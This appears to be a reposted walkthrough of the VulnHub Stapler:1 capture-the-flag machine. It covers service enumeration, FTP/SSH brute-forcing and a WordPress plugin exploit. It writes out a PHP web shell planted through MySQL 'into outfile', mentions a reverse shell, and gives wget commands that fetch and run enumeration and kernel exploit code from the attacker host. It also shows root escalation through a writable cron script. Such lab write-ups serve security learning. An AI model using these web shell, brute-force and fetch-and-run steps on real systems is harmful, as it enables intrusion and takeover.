VulnHub: STAPLER: 1-泓源视野

VulnHub: STAPLER: 1

VulnHub: STAPLER: 1

Initial foothold

  1. Network discovery

My target is 10.0.2.31.

VulnHub: STAPLER: 1插图1

VulnHub: STAPLER: 1插图2

2. Port scan

nmap -Pn -p1000- 10.0.2.31
VulnHub: STAPLER: 1插图3

VulnHub: STAPLER: 1插图4

3. OS and service scan

There’re services as listed:

  • port 21 vsftpd w/ anonymous login
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • port 53 dnsmasq 2.75
  • port 80 PHP cli server 5.5 or later
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
  • port 666 doom
  • port 3306 MySQL 5.7.12–0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
VulnHub: STAPLER: 1插图5

VulnHub: STAPLER: 1插图6

VulnHub: STAPLER: 1插图7

VulnHub: STAPLER: 1插图8

VulnHub: STAPLER: 1插图9

VulnHub: STAPLER: 1插图10

VulnHub: STAPLER: 1插图11

VulnHub: STAPLER: 1插图12

4. Vuln scan

VulnHub: STAPLER: 1插图13

VulnHub: STAPLER: 1插图14

VulnHub: STAPLER: 1插图15

VulnHub: STAPLER: 1插图16

Initial enumeration/searching existing exploits of each service

  • port 21 vsftpd 3.0.3 w/ anonymous login

There aren’t any public exploits that I can use.

Login w/ anonymous

username: anonymous
VulnHub: STAPLER: 1插图17

VulnHub: STAPLER: 1插图18

List files

VulnHub: STAPLER: 1插图19

VulnHub: STAPLER: 1插图20

Download it

VulnHub: STAPLER: 1插图21

VulnHub: STAPLER: 1插图22

Read it

Elly has FTP account.

VulnHub: STAPLER: 1插图23

VulnHub: STAPLER: 1插图24

  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

There’s a banner.

VulnHub: STAPLER: 1插图25

VulnHub: STAPLER: 1插图26

  • port 53 dnsmasq 2.75

Reverse lookup

Nothing

VulnHub: STAPLER: 1插图27

VulnHub: STAPLER: 1插图28

  • port 80 PHP cli server 5.5 or later

Nikto

There’re ‘.bashrc’ and ‘.profile’.

VulnHub: STAPLER: 1插图29

VulnHub: STAPLER: 1插图30

VulnHub: STAPLER: 1插图31

VulnHub: STAPLER: 1插图32

Download ‘.bashrc’ and ‘.profile’. and read them

wget http://10.0.2.31/.profile
VulnHub: STAPLER: 1插图33

VulnHub: STAPLER: 1插图34

Nothing

VulnHub: STAPLER: 1插图35

VulnHub: STAPLER: 1插图36

VulnHub: STAPLER: 1插图37

VulnHub: STAPLER: 1插图38

Further directory enumeration

Nothing

VulnHub: STAPLER: 1插图39

VulnHub: STAPLER: 1插图40

  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)

I googled the existing exploit and there’s a sambacry, but I need to have a credential. I’ll leave this for a while.

opsxcq/exploit-CVE-2017-7494

Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services…

github.com

Enumeration

can access \kathy and \tmp.

VulnHub: STAPLER: 1插图41

VulnHub: STAPLER: 1插图42

Read the file, I got usernames.

VulnHub: STAPLER: 1插图43

VulnHub: STAPLER: 1插图44

Save them as users.txt

VulnHub: STAPLER: 1插图45

Connect accessible directory, /kathy

dir
VulnHub: STAPLER: 1插图46

dirget to_do-list.txt
VulnHub: STAPLER: 1插图47

get vsftpd.confget wordpress-4.tar.gz
VulnHub: STAPLER: 1插图48

Read file

VulnHub: STAPLER: 1插图49

VulnHub: STAPLER: 1插图50

Unzip WordPress and read its configuration file

cd wordpressfind . -name '*.php' | grep configcat ./wp-config-sample.php

Nothing

VulnHub: STAPLER: 1插图51

VulnHub: STAPLER: 1插图52

  • port 666 doom

There’s a file.

VulnHub: STAPLER: 1插图53

VulnHub: STAPLER: 1插图54

Connect and retrieve the file

ls -la
VulnHub: STAPLER: 1插图55

VulnHub: STAPLER: 1插图56

Read file’s metadata

It’s a zip file.

VulnHub: STAPLER: 1插图57

VulnHub: STAPLER: 1插图58

Unzip it

VulnHub: STAPLER: 1插图59

Open it.

VulnHub: STAPLER: 1插图60

Connect another accessible directory, /tmp

It’s a program called ‘ls’, not much useful.

VulnHub: STAPLER: 1插图61

VulnHub: STAPLER: 1插图62

  • port 3306 MySQL 5.7.12–0ubuntu1

I cannot access this right now.

  • port 12380 Apache httpd 2.4.18 ((Ubuntu))

Nikto

It’s an HTTPS site.

VulnHub: STAPLER: 1插图63

VulnHub: STAPLER: 1插图64

Nikto again

VulnHub: STAPLER: 1插图65

VulnHub: STAPLER: 1插图66

VulnHub: STAPLER: 1插图67

VulnHub: STAPLER: 1插图68

Directory enumeration

VulnHub: STAPLER: 1插图69

VulnHub: STAPLER: 1插图70

Access the site

VulnHub: STAPLER: 1插图71

Access /admin112233/

VulnHub: STAPLER: 1插图72

Access /blogblog/

VulnHub: STAPLER: 1插图73

Read through every post.

VulnHub: STAPLER: 1插图74

VulnHub: STAPLER: 1插图75

VulnHub: STAPLER: 1插图76

VulnHub: STAPLER: 1插图77

Scan WordPress

There’s a list of users.

VulnHub: STAPLER: 1插图78

save as ‘users_wp.txt’

VulnHub: STAPLER: 1插图79

VulnHub: STAPLER: 1插图80

Scan for plugin

VulnHub: STAPLER: 1插图81

VulnHub: STAPLER: 1插图82

I googled and came across this exploit code of ‘advanced-video-embed-videos-or-playlists’.

gtech/39646

WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update - gtech/39646

github.com

Read the script and edit it to match the target.

VulnHub: STAPLER: 1插图83

VulnHub: STAPLER: 1插图84

Exploitation

  1. FTP Port 21 — brute-forcing
  2. SSH Port 22 — brute-forcing
  3. HTTP(S) Port 12380 — brute-forcing and public exploit

Start w/ FTP Port 21 — brute-forcing

I will use users.txt as username and password because some people use the same string to be username and password.

I got the credential.

VulnHub: STAPLER: 1插图85

VulnHub: STAPLER: 1插图86

username: SHayslettpassword: SHayslettls -la

Not much use right now

VulnHub: STAPLER: 1插图87

Next is SSH Port 22 — brute-forcing

VulnHub: STAPLER: 1插图88

Connect

Now, I got the shell.

VulnHub: STAPLER: 1插图89

Last one, HTTP(S) Port 12380 — brute-forcing and public exploit

Starting w/ brute-forcing and leave it for a while.

VulnHub: STAPLER: 1插图90

VulnHub: STAPLER: 1插图91

Using public exploit

Now I got a MySQL credential.

VulnHub: STAPLER: 1插图92

VulnHub: STAPLER: 1插图93

4. MySQL port 3306

Remote login w/ root : plbkac

VulnHub: STAPLER: 1插图94

VulnHub: STAPLER: 1插图95

I’ll create an outfile w/ the content of PHP shell command.

Normally, I’ll store the shell file within the WordPress site. So, the path probably is:

I’ll use MySQL command to create PHP shell.

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
VulnHub: STAPLER: 1插图96

VulnHub: STAPLER: 1插图97

Verify if the file exists.

VulnHub: STAPLER: 1插图98

Intercept the request w/ Burp Suite and send it to the repeater

Add ‘?cmd=id’ to test the shell function.

VulnHub: STAPLER: 1插图99

Prepare listener on port 443

VulnHub: STAPLER: 1插图100

VulnHub: STAPLER: 1插图101

I’ll supply a reverse shell command to the generated shell using this cheatsheet:

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…

pentestmonkey.net

Encode to URL w/ Burp Suite’s decoder.

VulnHub: STAPLER: 1插图102

VulnHub: STAPLER: 1插图103

Supply encoded reverse shell command w/ repeater.

VulnHub: STAPLER: 1插图104

VulnHub: STAPLER: 1插图105

After many tries, I succeeded w/ this command.

VulnHub: STAPLER: 1插图106

VulnHub: STAPLER: 1插图107

Back to the listener, now I got the shell.

VulnHub: STAPLER: 1插图108

VulnHub: STAPLER: 1插图109

Privilege Escalation

I’ll continue w/ WordPress shell.

Get TTY shell

  1. Explore directory as listed
/tmp/var/log/var/www/https//var/mail

I came across this /var/mail/www-data. There’s a PHP-mailer, but I don't know how to exploit it. Let’s skip this for a moment.

VulnHub: STAPLER: 1插图110

VulnHub: STAPLER: 1插图111

2. LinEnum.sh

Prepare attacker machine to be file server

VulnHub: STAPLER: 1插图112

VulnHub: STAPLER: 1插图113

Download, store in /tmp, change permission, and run

wget http://10.0.2.32/LinEnum.shchmod 777 LinEnum.sh./LinEnum.sh
VulnHub: STAPLER: 1插图114

VulnHub: STAPLER: 1插图115

These are information that I’ve found interesting.

Kernel version 4.4.0

VulnHub: STAPLER: 1插图116

VulnHub: STAPLER: 1插图117

User that can run sudo, peter

VulnHub: STAPLER: 1插图118

VulnHub: STAPLER: 1插图119

Cronjob located in ‘/etc/cron.d’

VulnHub: STAPLER: 1插图120

VulnHub: STAPLER: 1插图121

Running service, ‘cron -f’ indicating there’s running cronjob.

VulnHub: STAPLER: 1插图122

VulnHub: STAPLER: 1插图123

There’s a password in ‘.bash_history’

VulnHub: STAPLER: 1插图124

VulnHub: STAPLER: 1插图125

3. Exploit

  • Login as peter and verify sudo

From LinEnum.sh result

VulnHub: STAPLER: 1插图118

VulnHub: STAPLER: 1插图119

VulnHub: STAPLER: 1插图124

VulnHub: STAPLER: 1插图125

Password: JZQuyIN5

Verify sudo

VulnHub: STAPLER: 1插图126

VulnHub: STAPLER: 1插图127

Change to root

whoami

Now, I’m root.

VulnHub: STAPLER: 1插图128

  • cronjob

From LinEnum.sh result

VulnHub: STAPLER: 1插图129

I will verify the path of these services

There’s ‘.sh’ script.

VulnHub: STAPLER: 1插图130

Verify permission

It’s owned by root and can be edited by anyone.

VulnHub: STAPLER: 1插图131

Read its content

VulnHub: STAPLER: 1插图132

VulnHub: STAPLER: 1插图133

Append the command to get a root shell and verify

cat /usr/local/sbin/cron-logrotate.sh
VulnHub: STAPLER: 1插图134

VulnHub: STAPLER: 1插图135

Wait for a while and verify /tmp

Now, I got rootbash

VulnHub: STAPLER: 1插图136

VulnHub: STAPLER: 1插图137

Run it

VulnHub: STAPLER: 1插图138

VulnHub: STAPLER: 1插图139

  • kernel exploitation

Verify kernel version

This machine is Linux kernel 4.4.0 32 bit.

VulnHub: STAPLER: 1插图140

VulnHub: STAPLER: 1插图141

Search w/ searchsploit

After many tries, I succeeded w/ this exploit.

VulnHub: STAPLER: 1插图142

VulnHub: STAPLER: 1插图143

Copy and read it

cat 39772.txt
VulnHub: STAPLER: 1插图144

VulnHub: STAPLER: 1插图145

I followed the provided link.

808 - project-zero - Project Zero - Monorail

Edit description

bugs.chromium.org

I got the exploit file.

VulnHub: STAPLER: 1插图146

VulnHub: STAPLER: 1插图147

Decompressed

VulnHub: STAPLER: 1插图148

VulnHub: STAPLER: 1插图149

Download to target machine.

wget http:/10.0.2.32/suidhelper.cwget http:/10.0.2.32/doubleput.cwget http:/10.0.2.32/compile.sh./compile.sh

Now, I’m root.

VulnHub: STAPLER: 1插图150

VulnHub: STAPLER: 1插图151

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
64

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8231794 位访客, 您的IP是:[18.97.14.87]